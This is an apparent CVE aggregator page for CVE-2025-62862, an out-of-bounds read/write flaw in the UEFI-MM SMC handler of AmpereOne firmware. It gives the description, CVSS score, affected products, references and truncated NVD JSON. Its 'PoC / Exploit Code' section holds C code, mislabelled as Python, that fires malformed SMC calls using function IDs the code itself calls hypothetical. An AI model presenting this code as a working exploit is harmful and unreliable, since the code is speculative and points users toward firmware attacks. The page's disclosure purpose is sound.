CVE-2025-62862

Description

Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM Boot Error Record Table driver that could result in (1) an out-of-bounds read which leaks Secure-EL0 information to a process running in Non-Secure state or (2) an out-of-bounds write which corrupts Secure or Non-Secure memory, limited to memory mapped to UEFI-MM Secure Partition by the Secure Partition Manager.

CVSS Details

CVSS Score

4.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE

Ampere AmpereOne AC03 < 3.5.9.3

Ampere AmpereOne AC04 < 4.4.5.2

Ampere AmpereOne M < 5.4.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-62862 PoC - Conceptual SMC Call Trigger
// This PoC demonstrates the concept of triggering the vulnerable SMC call
// Note: Actual exploitation requires ARM64 environment and UEFI-MM access

#include <stdio.h>
#include <stdint.h>

// SMC function IDs (hypothetical values for demonstration)
#define SMC_CALL_BOOT_ERROR_RECORD 0xC4000060
#define SMC_CALL_ID_MASK 0xFFFFFFFF

// Boot Error Record Table structure (simplified)
struct boot_error_record {
    uint64_t record_id;
    uint64_t buffer_addr;
    uint64_t buffer_size;
    uint32_t flags;
};

// Trigger vulnerable SMC call with malformed parameters
void trigger_vulnerable_smc(uint64_t func_id, uint64_t arg0, uint64_t arg1, uint64_t arg2) {
    register uint64_t x0 asm("x0") = func_id;
    register uint64_t x1 asm("x1") = arg0;
    register uint64_t x2 asm("x2") = arg1;
    register uint64_t x3 asm("x3") = arg2;
    
    // SMC instruction - transition to secure monitor mode
    __asm__ volatile("smc #0" : "+r"(x0), "+r"(x1), "+r"(x2), "+r"(x3));
}

int main() {
    printf("[*] CVE-2025-62862 PoC - AmpereOne UEFI-MM SMC Vulnerability\n");
    printf("[*] Target: Ampere AmpereOne AC03/AC04/M devices\n\n");
    
    // Out-of-bounds read trigger
    printf("[>] Triggering OOB Read - Leaking Secure-EL0 information\n");
    struct boot_error_record record = {
        .record_id = 0x01,
        .buffer_addr = 0xFFFFFFFFFFFFFFFF,  // Invalid address
        .buffer_size = 0x10000,             // Large size
        .flags = 0x00
    };
    
    trigger_vulnerable_smc(
        SMC_CALL_BOOT_ERROR_RECORD,
        (uint64_t)&record,
        0xFFFFFFFF,  // Malformed parameter
        0x00
    );
    
    printf("[>] Triggering OOB Write - Corrupting Secure/Non-Secure memory\n");
    // Out-of-bounds write trigger
    trigger_vulnerable_smc(
        SMC_CALL_BOOT_ERROR_RECORD,
        0x00,
        0xFFFFFFFFFFFFFFFF,  // Invalid write address
        0x4141414141414141   // Malicious data
    );
    
    printf("[!] Note: Actual exploitation requires UEFI-MM access and proper ARM64 environment\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62862
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62862
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62862/
[4] VulDB https://vuldb.com/cve/CVE-2025-62862
[5] https://amperecomputing.com/products/product-security
[6] https://amperecomputing.com/products/security-bulletins/amp-sb-0007

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62862", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:10.320", "lastModified": "2025-12-31T00:28:47.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM Boot Error Record Table driver that could result in (1) an out-of-bounds read which leaks Secure-EL0 information to a process running in Non-Secure state or (2) an out-of-bounds write which corrupts Secure or Non-Secure memory, limited to memory mapped to UEFI-MM Secure Partition by the Secure Partition Manager."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.5, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "A9523999-81AB-47DD-B8D5-A352FE3B1D5B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:*", "matchCriteriaId": "2384E36F-8268-404E-80D6-C98E3EA1C299"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "A13FFFC6-7355-4F15-B1AC-A1F8D71A4AD1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9EBCAD2-E1D0-40FC-8791-AD0F50EEBE50"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "54A0E3ED-F092-448D-8ACE-A0A16C4B451E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E5723F8-301B-49B1-8968-1337689146DE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "6996EFF6-6CF0-44B9-997F-A3C721D0CDA2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:*", "matchCriteriaId": "45C2645C-B01C-4070-A1D0-32D614028AD3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "90C08FC4-2D5F-4E67-88AB-A82A1C0D60EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:*", "matchCriteriaId": "A1766FF3-1D99-4FED-AC42-E0954FCCBF0C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a96-36m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "753CE183-4807-4C99-8BD4-43B57C5A44D6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a96-36m:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E84F28F-985D-4A5F-9A4E-49B7A39F913E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a96-36x_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.5.2", "matchCriteriaId": "851C8C9F-5FFB-451D-95CC-75A8CDAEC59B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a96-36x:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A293338-7B91-4536-BE77-7A1FE411DFBC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ampe ... (truncated)